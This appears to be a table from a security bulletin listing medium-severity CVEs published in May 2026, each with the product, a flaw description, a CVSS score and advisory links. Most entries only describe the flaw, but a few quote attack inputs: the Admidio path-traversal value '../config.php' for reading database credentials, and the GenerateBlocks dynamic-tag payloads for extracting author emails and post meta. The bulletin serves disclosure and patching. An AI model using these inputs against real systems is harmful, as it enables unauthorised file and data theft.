| cab-fare-calculator--cab-fare-calculator | WordPress Plugin cab-fare-calculator 1.0.3 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the controller parameter in tblight.php. Attackers can supply path traversal sequences through the controller GET parameter to include and execute files outside the intended controllers directory. | 2026-05-10 | 6.2 | CVE-2022-50954 | ExploitDB-50843 Official Product Homepage VulnCheck Advisory: WordPress Plugin cab-fare-calculator 1.0.3 Local File Inclusion |
| amministrazione-aperta--amministrazione-aperta | WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the open parameter. Attackers can supply file paths through the open GET parameter in dispatcher.php to include and read sensitive files accessible to the web server. | 2026-05-10 | 6.2 | CVE-2022-50956 | ExploitDB-50838 Official Product Homepage VulnCheck Advisory: WordPress Plugin amministrazione-aperta 3.7.3 Local File Read |
| avatar_uploader--avatar_uploader | Drupal avatar_uploader 7.x-1.0-beta8 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the file parameter. Attackers can craft URLs with script payloads in the file parameter of avatar_uploader.pages.inc to execute arbitrary JavaScript in victim browsers. | 2026-05-10 | 6.1 | CVE-2022-50957 | ExploitDB-50841 Product Reference VulnCheck Advisory: Drupal avatar_uploader 7.x-1.0-beta8 Reflected XSS |
| jetpack--Jetpack | WordPress Plugin Jetpack 9.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the post_id parameter. Attackers can craft URLs to the grunion-form-view.php endpoint with script payloads in the post_id parameter to execute arbitrary JavaScript in victim browsers. | 2026-05-10 | 6.1 | CVE-2022-50958 | ExploitDB-50735 Product Reference VulnCheck Advisory: WordPress Plugin Jetpack 9.1 Cross Site Scripting via grunion-form-view.php |
| wpdevart--Contact Form Builder | WordPress Contact Form Builder 1.6.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by exploiting the form_id parameter. Attackers can craft malicious URLs to code_generator.php with script payloads in the form_id parameter to execute arbitrary JavaScript in victim browsers. | 2026-05-10 | 6.1 | CVE-2022-50959 | ExploitDB-50734 Product Reference VulnCheck Advisory: WordPress Contact Form Builder 1.6.1 Cross-Site Scripting via code_generator.php |
| Varun Sridharan--International Sms For Contact Form | WordPress International Sms For Contact Form 7 Integration version 1.2 contains a reflected cross-site scripting vulnerability in the page parameter of the admin settings interface. Attackers can inject malicious scripts through the page parameter in class-sms-log-display.php to execute arbitrary JavaScript in administrator browsers. | 2026-05-10 | 6.1 | CVE-2022-50960 | ExploitDB-50719 Product Reference VulnCheck Advisory: WordPress International Sms Contact Form 7 Integration 1.2 XSS |
| IP2Location--IP2Location Country Blocker | WordPress Plugin IP2Location Country Blocker 2.26.7 contains a stored cross-site scripting vulnerability that allows authenticated users to inject arbitrary JavaScript code through the Frontend Settings interface. Attackers can inject malicious scripts in the URL field of the Display page settings that execute when administrators or other authenticated users visit the plugin settings page. | 2026-05-10 | 6.4 | CVE-2022-50961 | ExploitDB-50709 Product Reference VulnCheck Advisory: WordPress Plugin IP2Location Country Blocker 2.26.7 Stored XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the orders/myOrders module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50962 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 myOrders Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/active module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50963 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 myAuctions active Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/loose module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50964 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 myAuctions loose Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the posts/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50965 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 posts manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the news/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50966 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 news manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the tickets/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50967 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 tickets manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50968 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 auctions manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the backend/mailingLog/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50969 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 mailingLog manage Reflected XSS |
| Spondonit--AmazCart CMS | AmazCart CMS 3.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search functionality. Attackers can enter script tags in the search box to execute arbitrary JavaScript that fires when search history is viewed or results are displayed. | 2026-05-05 | 6.1 | CVE-2023-54349 | ExploitDB-51219 Official Product Homepage Product Reference VulnCheck Advisory: AmazCart CMS 3.4 Reflected Cross-Site Scripting via Search |
| Mikrotik--RouterOS | RouterOS provides various services that rely on correct verification of client and server certificates to secure confidentiality and integrity of communications. This includes OpenVPN, CAPsMAN, Dot1x (802.1X), among others. The vulnerability lies in shared certificate validation logic which uses the system certificate store that is shared and equally trusted by all system services. This causes confusion of scope, allowing any certificate authority present in the system-wide trust store to be trusted in any context (with some exceptions), allowing partial or full authentication bypass in CAPsMAN, OpenVPN, Dot1X and potentially others. | 2026-05-05 | 6.5 | CVE-2025-42611 | https://www.cert.si/en/cve-2025-42611/ |
| Medtronic--MyCareLink Patient Monitor 24950 | Medtronic MyCareLink Patient Monitor has an internal serial interface, which allows an attacker with physical access to access a login prompt via a UART terminal. | 2026-05-07 | 6.8 | CVE-2025-4386 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/mycarelink-patient-monitor-vulnerabilities.html https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01 |
| Medtronic--MyCareLink Patient Monitor 24950 | Medtronic MyCareLink Patient Monitor uses per-product credentials that are stored in a recoverable format. An attacker can use these credentials to modify encrypted drive data. | 2026-05-07 | 6.8 | CVE-2025-4397 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/mycarelink-patient-monitor-vulnerabilities.html https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01 https://www.medtronic.com/en-us/e/product-security/security-bulletins/mycarelink-8-7-18.html https://www.cisa.gov/news-events/ics-medical-advisories/icsma-18-219-01 |
| Qualcomm, Inc.--Snapdragon | Transient DOS when processing target power rate tables during channel configuration. | 2026-05-04 | 6.5 | CVE-2025-47401 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS when processing a malformed Fast Transition response frame with an invalid header structure during wireless roaming. | 2026-05-04 | 6.5 | CVE-2025-47403 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when dynamically changing the size of a previously allocated buffer while its contents are being modified. | 2026-05-04 | 6.5 | CVE-2025-47404 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Information Disclosure while processing IOCTL handler callbacks without verifying buffer size. | 2026-05-04 | 6.1 | CVE-2025-47406 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Apache Software Foundation--Apache CloudStack | Due to multiple time-of-check time-of-use race conditions in the resource count check and increment logic, as well as missing validations, users of the platform are able to exceed the allocation limits configured for their accounts/domains. This can be used by an attacker to degrade the infrastructure's resources and lead to denial of service conditions. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue. | 2026-05-08 | 6.5 | CVE-2025-69233 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Hikvision--HikCentral Professional | There is an Access Control Vulnerability in some HikCentral Professional versions. This could allow an unauthenticated user to obtain the admin permission. | 2026-05-09 | 6.8 | CVE-2026-1749 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-hikcentral-professional/ |
| Cisco--Cisco IoT Field Network Director (IoT-FND) | A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to retrieve files that they do not have permission to access. This vulnerability is due to insufficient file access checks. An attacker could exploit this vulnerability by submitting crafted input in the web-based management interface. A successful exploit could allow the attacker to read files that they are not authorized to access. | 2026-05-06 | 6.5 | CVE-2026-20168 | cisco-sa-iot-fnd-dos-n8N26Q4u |
| Cisco--Cisco IoT Field Network Director (IoT-FND) | A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to access files and execute commands on a remote router. This vulnerability is due to insufficient input validation of user-supplied data. An attacker could exploit this vulnerability by submitting crafted input in the web-based management interface. A successful exploit could allow the attacker to create, read, or delete files and execute limited commands in user EXEC mode on a remote router. | 2026-05-06 | 6.4 | CVE-2026-20169 | cisco-sa-iot-fnd-dos-n8N26Q4u |
| WProyal--Royal Elementor Addons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WProyal Royal Elementor Addons allows Stored XSS. This issue affects Royal Elementor Addons: from n/a before 1.7.1053. | 2026-05-07 | 6.5 | CVE-2026-27421 | https://patchstack.com/database/wordpress/plugin/royal-elementor-addons/vulnerability/wordpress-royal-elementor-addons-plugin-1-7-1053-cross-site-scripting-xss-vulnerability?_s_id=cve |
| traccar--traccar | Traccar is an open source GPS tracking system. In versions between 6.11.1 and 6.13.0, the CSV export functionality writes position data, including user-controlled device and computed attributes, to CSV output without proper escaping. An attacker can inject spreadsheet formulas through exported fields. When a manager or administrator opens the exported CSV file in spreadsheet software, this can cause formula execution and lead to command execution or data exfiltration. This has been patched in version 6.13.0. | 2026-05-05 | 6.5 | CVE-2026-27644 | https://github.com/traccar/traccar/security/advisories/GHSA-745r-9qgj-x7m7 https://github.com/traccar/traccar/blob/v6.11.1/src/main/java/org/traccar/reports/CsvExportProvider.java#L89-L91 |
| jegstudio--Gutenverse Ultimate WordPress FSE Blocks Addons & Ecosystem | The Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'separatorIconSVG' parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-2868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc540e5c-180f-4743-b1fb-608aa0e3ae79?source=cve https://plugins.trac.wordpress.org/changeset/3507804/gutenverse |
| jegstudio--Gutenverse Ultimate WordPress FSE Blocks Addons & Ecosystem | The Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.5.3 via the import_images() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-05-05 | 6.4 | CVE-2026-2948 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac909a4b-d949-42eb-871a-963bc6242c12?source=cve https://plugins.trac.wordpress.org/changeset/3507804/gutenverse |
| gofiber--fiber | Fiber is a web framework for Go. In github.com/gofiber/fiber/v3 versions through 3.1.0, the default key generator in the cache middleware uses only the request path and does not include the query string. As a result, requests for the same path with different query parameters can share a cache key and receive the wrong cached response. This can cause response mix-up for query-dependent endpoints and may expose data intended for a different request. This issue is fixed after version 3.1.0. | 2026-05-05 | 6.5 | CVE-2026-30246 | https://github.com/gofiber/fiber/security/advisories/GHSA-35hp-hqmv-8qg8 https://github.com/gofiber/fiber/blob/main/middleware/cache/cache_test.go#L599-L621 https://github.com/gofiber/fiber/blob/main/middleware/cache/config.go#L90-L92 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the X.Org X server. This out-of-bounds read vulnerability in the XKB geometry processing, specifically within the `CheckSetGeom()` and `XkbAddGeomKeyAlias` functions, allows an attacker to read uninitialized or out-of-bounds memory. An attacker with a connection to the X11 server, either locally or remotely, can exploit this without user interaction. This could lead to the disclosure of memory contents or cause a denial of service by crashing the server. | 2026-05-05 | 6.1 | CVE-2026-34000 | https://access.redhat.com/security/cve/CVE-2026-34000 RHBZ#2451107 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the X.Org X server. This vulnerability, an out-of-bounds read, affects the XKB (X Keyboard Extension) modifier map handling. An attacker with access to the X11 server can exploit this by sending a malformed request, which causes the server to read beyond its intended memory boundaries. This can lead to the exposure of sensitive information or cause the server to crash, resulting in a denial of service. | 2026-05-05 | 6.1 | CVE-2026-34002 | https://access.redhat.com/security/cve/CVE-2026-34002 RHBZ#2451112 |
| edge22--GenerateBlocks | The GenerateBlocks plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.0. This is due to missing object-level authorization checks in the /wp-json/generateblocks/v1/dynamic-tag-replacements REST endpoint. The endpoint only verifies that the user has the edit_posts capability but does not verify the user has permission to access the specific post or its associated data referenced by attacker-controlled id parameters in dynamic tag content. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive information from arbitrary posts including author email addresses and non-protected post meta values by crafting dynamic tag payloads such as `{{post_meta id:<target>\|key:<meta_key>}}` and `{{post_title id:<target>\|link:author_email}}`. | 2026-05-05 | 6.5 | CVE-2026-3454 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0297d524-e016-4f8d-920c-d58c62edb2a0?source=cve https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tags.php#L424 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tags.php#L501 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tag-callbacks.php#L64 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tag-callbacks.php#L364 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/class-meta-handler.php#L335 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tags.php#L392 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3495827%40generateblocks%2Ftrunk&old=3415721%40generateblocks%2Ftrunk&sfp_email=&sfph_mail= |
| Oracle Corporation--Oracle OCI CLI of Oracle Open Source Projects | Vulnerability in the Oracle OCI CLI product of Oracle Open Source Projects. The supported version that is affected is 3.77. This easily exploitable vulnerability allows an unauthenticated attacker with network access to compromise Oracle OCI CLI. Successful attacks of this vulnerability can result in Oracle OCI CLI allowing users to place imported files outside the intended directory. | 2026-05-06 | 6.1 | CVE-2026-35254 | Oracle Advisory |
| Oracle Corporation--Oracle Cloud Native Environment Command Line Interface | Vulnerability in the Oracle Cloud Native Environment Command Line Interface product of Oracle Open Source Projects. The supported version that is affected is v2.3.2. This easily exploitable vulnerability allows an unauthenticated attacker to compromise the Oracle Cloud Native Environment Command Line Interface product via a malicious environment variable. Successful attacks of this vulnerability can result in Oracle Cloud Native Environment Command Line Interface allowing users to execute arbitrary code. | 2026-05-06 | 6.6 | CVE-2026-35255 | Oracle Advisory |
| OpenStack--Cyborg | In OpenStack Cyborg before 16.0.1, the Accelerator Request (ARQ) API does not enforce project ownership at any layer. The project_id column in the database is never populated (NULL for every ARQ), database queries have no project filtering, and policy checks are self-referential (the authorize_wsgi decorator compares the caller's project_id with itself rather than the target resource). Any authenticated non-admin user can complete various actions such as deleting ARQs bound to other projects' instances, aka cross-tenant denial of service. | 2026-05-07 | 6.3 | CVE-2026-40214 | https://bugs.launchpad.net/openstack-cyborg/+bug/2144056 https://www.openwall.com/lists/oss-security/2026/05/07/6 https://security.openstack.org/ossa/OSSA-2026-011.html |
| pglombardo--PasswordPusher | Password Pusher is an open source application to communicate sensitive information over the web. Prior to versions 1.69.3 and 2.4.2, a security issue in OSS PasswordPusher allowed unauthenticated creation of file-type pushes through a generic JSON API create path under certain configurations. This could bypass the intended authentication boundary for file push creation. This issue has been patched in versions 1.69.3 and 2.4.2. | 2026-05-08 | 6.5 | CVE-2026-41308 | https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-qfh8-f79c-x86c https://github.com/pglombardo/PasswordPusher/pull/4381 https://github.com/pglombardo/PasswordPusher/commit/45dc2512875231ef45ecd5dfc8c3c8185f882bf4 |
| ironfede--openmcdf | OpenMcdf is a fully .NET / C# library to manipulate Compound File Binary File Format files, also known as Structured Storage. Prior to version 3.1.3, OpenMcdf does not detect cycles in the directory entry red-black tree of a Compound File Binary (CFB) document. A crafted CFB file with a cycle in the LeftSiblingID / RightSiblingID chain causes Storage.EnumerateEntries() and Storage.OpenStream() to loop indefinitely, consuming the calling thread with no possibility of recovery via try/catch. This issue has been patched in version 3.1.3. | 2026-05-08 | 6.2 | CVE-2026-41511 | https://github.com/openmcdf/openmcdf/security/advisories/GHSA-jxpf-xq2m-q525 https://github.com/openmcdf/openmcdf/commit/24f445a557fc4f46461cf6d02d296cce16c293a0 https://github.com/openmcdf/openmcdf/releases/tag/v3.1.3 |
| th30d4y--IP | In th30d4y/IP from version 1.0.1 to before version 2.0.1, a DOM-Based Cross-Site Scripting (XSS) vulnerability was identified in an IP Reputation Checker application. Unsanitized user input was directly rendered in the browser, allowing attackers to execute arbitrary JavaScript. This issue has been patched in version 2.0.1. | 2026-05-08 | 6.1 | CVE-2026-41575 | https://github.com/th30d4y/IP/security/advisories/GHSA-j7wv-7j97-9qh9 |
| marko-js--marko | Marko is a declarative, HTML-based language for building web apps. Prior to marko version 5.38.36 and prior to @marko/runtime-tags 6.0.164, when dynamic text is interpolated into a <script> or <style> tag the Marko runtime failed to prevent tag breakout when the closing tag used non-lowercase casing. An attacker able to place input inside a <script> or <style> block could break out of the tag with </SCRIPT>, </Style>, etc. and inject arbitrary HTML/JavaScript, resulting in cross-site scripting. This issue has been patched in marko version 5.38.36 and @marko/runtime-tags 6.0.164. | 2026-05-08 | 6.4 | CVE-2026-41591 | https://github.com/marko-js/marko/security/advisories/GHSA-x9fj-57fh-c8wq |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, a missing error handling could lead an authenticated Incus user to cause a daemon crash through the import of a truncated storage bucket backup file. This issue has been patched in version 7.0.0. | 2026-05-07 | 6.5 | CVE-2026-41647 | https://github.com/lxc/incus/security/advisories/GHSA-fwj8-62r8-8p8m https://github.com/lxc/incus/releases/tag/v7.0.0 |
| NaturalIntelligence--fast-xml-parser | fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the "-->" sequence in comment content or the "]]>" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0. | 2026-05-07 | 6.1 | CVE-2026-41650 | https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6 https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate(). An authenticated user can supply a path traversal payload (e.g., ../config.php) to read arbitrary files accessible to the web server process, including adm_my_files/config.php which contains database credentials. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.5 | CVE-2026-41655 | https://github.com/Admidio/admidio/security/advisories/GHSA-m3vp-3jjm-gpmx https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.5 | CVE-2026-41658 | https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, an unauthenticated attacker can execute arbitrary JavaScript in any Admidio user's browser through a reflected XSS in system/msg_window.php. The endpoint passes user input through htmlspecialchars(), which does not encode square brackets. A subsequent call to Language::prepareTextPlaceholders() converts those brackets into HTML angle brackets, producing executable markup. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.1 | CVE-2026-41661 | https://github.com/Admidio/admidio/security/advisories/GHSA-gq27-fc8w-vcmp https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the OIDC token introspection endpoint (/modules/sso/index.php/oidc/introspect) always returns {"active": true} for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (/oidc/revoke) returns {"revoked": true} without actually revoking any token, preventing resource servers from invalidating compromised credentials. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.8 | CVE-2026-41671 | https://github.com/Admidio/admidio/security/advisories/GHSA-9xx5-cv6j-x533 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, backup.GetInfo() trusts the inline backup/index.yaml config when present and only falls back to parsing the legacy backup/container/backup.yaml file if result.Config == nil. As a result, an archive can carry a valid inline config that passes the initial import preflight while also carrying a malformed legacy backup/container/backup.yaml file that is reparsed later from the restored file system. ParseConfigYamlFile() accepts YAML documents with no container section, and multiple downstream consumers then dereference .Container without checking for nil. Confirmed examples in the instance restore and import flow include backup.UpdateInstanceConfig() and internalImportFromBackup(). An authenticated user with permission to import instance backups may be able to crash the Incus daemon with a crafted backup archive whose inline backup/index.yaml is valid but whose extracted legacy backup.yaml omits the container section. The crash occurs in the restore path after archive extraction has begun. This issue has been patched in version 7.0.0. | 2026-05-07 | 6.5 | CVE-2026-41684 | https://github.com/lxc/incus/security/advisories/GHSA-x5r6-jr56-89pv https://github.com/lxc/incus/releases/tag/v7.0.0 |
| ellite--Wallos | Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the webhook notification feature reuses an administrator-configured local-target allowlist for every logged-in user. Any normal user can fully control a webhook URL, headers, and body, then use Wallos to send server-side requests to allowlisted internal automation services. When such a target exposes deployment or execution APIs, this can further enable adjacent-service RCE, but that downstream result is conditional on the target service. At time of publication, there are no publicly available patches. | 2026-05-07 | 6 | CVE-2026-41689 | https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv |
| i18next--i18next-http-backend | i18nextify is a JavaScript library that adds website internationalization via a script tag, without source code changes. Versions prior to 3.0.5 interpolate the lng and ns values directly into the configured loadPath / addPath URL template without any encoding, validation, or path sanitisation. When an application exposes the language-code selection to user-controlled input (the default - i18next-browser-languagedetector reads ?lng= query params, cookies, localStorage, and request headers), an attacker can inject characters that change the structure of the outgoing request URL. This is a single URL-injection vulnerability. The attacker-controlled value is neutralised before it is used as part of an output URL string; the attack shape covers both path traversal and broader URL-structure injection - both are closed by the one interpolateUrl sanitisation fix. This issue has been fixed in version 3.0.5. If users cannot upgrade immediately, they can work around the issue by sanitising lng / ns before they reach i18next (strip .., /, \, ?, #, %, whitespace, and control characters; cap the length). | 2026-05-07 | 6.5 | CVE-2026-41691 | https://github.com/i18next/i18next-http-backend/security/advisories/GHSA-q89c-q3h5-w34g https://github.com/i18next/i18next-http-backend/commit/4cee84f229c637b9c182366d3156f726d407a621 |
| locize--i18next-locize-backend | i18next-locize-backend is a simple i18next backend for locize.com which can be used in Node.js, in the browser and for Deno. Prior to version 9.0.2, i18next-locize-backend interpolates lng, ns, projectId, and version directly into the configured loadPath / privatePath / addPath / updatePath / getLanguagesPath URL templates with no path-component validation and no encoding. When an application exposes any of these values to user-controlled input (?lng= / ?ns= query parameters via i18next-browser-languagedetector, cookies, request headers, or a URL-derived projectId), a crafted value can change the structure of the outgoing request URL. Affected call sites in lib/index.js (pre-patch): the interpolate() helper is used at the five URL-build sites - _readAny/read (line 415 for private, 426 for public), getLanguages (lines 271 and 296), and writePage (lines 616 and 622) for the missing-key and update POST paths. The helper interpolate in lib/utils.js substitutes raw values with no encoding. This issue has been patched in version 9.0.2. | 2026-05-08 | 6.5 | CVE-2026-41885 | https://github.com/locize/i18next-locize-backend/security/advisories/GHSA-mgcp-mfp8-3q45 |
| givanz--Vvveb | Vvveb before 1.0.8.2 contains an unauthenticated reflected cross-site scripting vulnerability in the visual editor preview renderer that allows attackers to execute arbitrary JavaScript by manipulating the r query parameter and _component_ajax POST parameter. Attackers can craft a malicious link or auto-submitted form that causes victims to execute attacker-controlled JavaScript in the context of the Vvveb origin, as the gating function isEditor() performs no session, role, or token verification and the view handler injects raw HTML POST body content without sanitization. | 2026-05-07 | 6.1 | CVE-2026-41929 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g https://github.com/givanz/Vvveb/commit/54a9e846fb94192f1b31ae81d81d25c874662e6a https://www.vulncheck.com/advisories/vvveb-unauthenticated-reflected-xss-via-visual-editor |
| langgenius--dify | Dify before version 1.14.0 contains an authorization bypass vulnerability that allows authenticated users to read the full contents of files uploaded by other users within the same tenant by supplying an arbitrary file UUID in the files array of a chat-messages request. Attackers can exploit insufficient permission verification in the chat-messages endpoints to access files without ownership validation, bypassing workspace separation and signed URL protections to retrieve sensitive file contents through workflow processing. | 2026-05-05 | 6.5 | CVE-2026-41950 | https://github.com/langgenius/dify/releases/tag/1.14.0 https://huntr.com/bounties/181136ec-d957-4b75-8ea7-6fa7b8abd01d https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-uuid |
| MapServer--MapServer | MapServer is a system for developing web-based GIS applications. From version 6.0 to before version 8.6.2, a reflected XSS vulnerability in MapServer's WMS server allows an unauthenticated attacker to inject arbitrary HTML/JavaScript into the browser of any user who opens a crafted WMS URL. The vulnerability is triggered via FORMAT=application/openlayers combined with an unsanitized SRS parameter in WMS 1.3.0 requests. This issue has been patched in version 8.6.2. | 2026-05-08 | 6.1 | CVE-2026-42030 | https://github.com/MapServer/MapServer/security/advisories/GHSA-4g9f-ph64-hg2x https://github.com/MapServer/MapServer/releases/tag/rel-8-6-2 |
| patrickhener--goshs | goshs is a SimpleHTTPServer written in Go. Prior to version 2.0.2, the PUT upload handler (httpserver/updown.go) lacks the CSRF token validation that was added to the POST upload handler during the CVE-2026-40883 fix. Combined with the unconditional Access-Control-Allow-Origin: * on the OPTIONS preflight handler (httpserver/server.go), any website can write arbitrary files to a goshs instance through the victim's browser - bypassing network isolation (e.g. localhost, internal network). This issue has been patched in version 2.0.2. | 2026-05-04 | 6.5 | CVE-2026-42091 | https://github.com/patrickhener/goshs/security/advisories/GHSA-rhf7-wvw3-vjvm https://github.com/patrickhener/goshs/commit/0e715b94e10c3d1aa552276000f15f104dee2f32 https://github.com/patrickhener/goshs/releases/tag/v2.0.2 |
